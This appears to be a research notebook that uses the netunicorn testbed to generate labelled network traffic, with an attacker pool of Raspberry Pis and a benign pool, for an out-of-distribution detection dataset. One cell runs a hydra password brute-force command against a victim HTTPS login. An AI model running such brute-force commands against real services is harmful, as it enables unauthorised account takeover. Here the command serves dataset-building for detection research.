# Additional data collection of OOD example

In [ ]:
import sys
sys.version

In [ ]:
%load_ext dotenv
%dotenv

In [ ]:
import os

from netunicorn.base import MinionPool, Task
from netunicorn.base.experiment import Experiment, ExperimentStatus
from netunicorn.base.pipeline import Pipeline
from netunicorn.library.basic import ShellCommand
from netunicorn.client.remote import RemoteClient

In [ ]:
experiment_label = 'patator-ood-0.3.3'

In [ ]:
endpoint = os.environ['VICTIM_ENDPOINT'].removeprefix("https://")

In [ ]:
attacker_pipeline = Pipeline(tasks=[ShellCommand(f"hydra -l admin -P passwords.txt -s 443 https-get://{endpoint}")])
attacker_pipeline.environment_definition.image = "redacted/hydra:arm64"

In [ ]:
login = os.environ['VALID_VICTIM_LOGIN']
password = os.environ['VALID_VICTIM_PASSWORD']
class BenignTask(Task):
    def __init__(self, url):
        self.url = url
    
    def run(self):
        import subprocess
        for i in range(100):
            subprocess.check_output(f'curl ' + self.url, shell=True)
        return 0

class BenignTaskAsync(Task):
    def __init__(self, url):
        self.url = url
    
    def run(self):
        import aiohttp
        import asyncio
        import nest_asyncio
        nest_asyncio.apply()
        
        async def request():
            async with aiohttp.ClientSession() as session:
                r = await session.get(self.url)
                r.close()
        
        async def main():
            requests = [request() for _ in range(10)]
            await asyncio.gather(*requests)
        
        loop = asyncio.get_event_loop()
        for i in range(100):
            loop.run_until_complete(main())
        return 0

class BenignTaskAuthorized(Task):
    def __init__(self, label: str):
        self.label = label
    
    def run(self):
        import requests
        for i in range(100):
            requests.get('redacted/unicorn/mediator/api/v1/experiment/' + self.label, auth=(f'{login}', f'{password}'))
        return 0

In [ ]:
benign_pipeline = Pipeline()
for i in range(20):
    (benign_pipeline
     .then(BenignTask('redacted'))
     .then(BenignTask('redacted'))
     .then(BenignTaskAsync('redacted'))
     .then(BenignTaskAuthorized(experiment_label))
    )
    

benign_pipeline.environment_definition.image = "redacted"

In [ ]:
client = RemoteClient(
    endpoint=os.environ['UNICORN_ENDPOINT'],
    login=os.environ['UNICORN_LOGIN'],
    password=os.environ['UNICORN_PASSWORD']
)

In [ ]:
minion_pool = client.get_minion_pool()

In [ ]:
attacker_pool = MinionPool([x for x in minion_pool if x.name in {
    'raspi-e4:5f:01:75:6b:2c',
    'raspi-e4:5f:01:72:a2:eb',
}])
len(attacker_pool)

In [ ]:
benign_pool = MinionPool([x for x in minion_pool if x.name in {
    'raspi-e4:5f:01:56:d8:fc',
    'raspi-e4:5f:01:56:d8:f3',
    'raspi-e4:5f:01:75:54:04',
    'raspi-e4:5f:01:56:d6:ce',
    'raspi-e4:5f:01:56:d9:a2',
}])
len(benign_pool)

In [ ]:
experiment = Experiment().map(attacker_pool, attacker_pipeline).map(benign_pool, benign_pipeline)

In [ ]:
client.prepare_experiment(experiment, experiment_label)

In [ ]:
client.start_execution(experiment_label)